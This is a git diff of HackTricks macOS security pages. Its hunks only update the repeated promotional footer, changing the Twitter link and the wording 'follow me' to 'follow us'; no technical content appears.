diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md b/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md
index ba3569704..a738a6671 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -58,7 +58,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
index 848fac79f..904163ae6 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -541,7 +541,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
index 6cbcc9528..42b035e18 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -684,7 +684,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md
index eee6becaa..b9e57b4f1 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -462,7 +462,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md b/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md
index 3e9f2c9a9..fbd940b39 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -391,7 +391,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md b/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
index 82e6b936c..8f416f72e 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -106,7 +106,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md b/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md
index 16e553def..ac2fbd018 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -49,7 +49,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md b/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md
index 1a6039aac..444104441 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -191,7 +191,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md b/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md
index 0ce61062a..cb98171c6 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -74,7 +74,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
index d26b4e048..25a0ee260 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -223,7 +223,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md
index 23795c1f0..74fc7e1e8 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -68,7 +68,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
index cd19422b5..113c1d4bf 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -112,7 +112,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
index 06b1538e4..04d794f7a 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
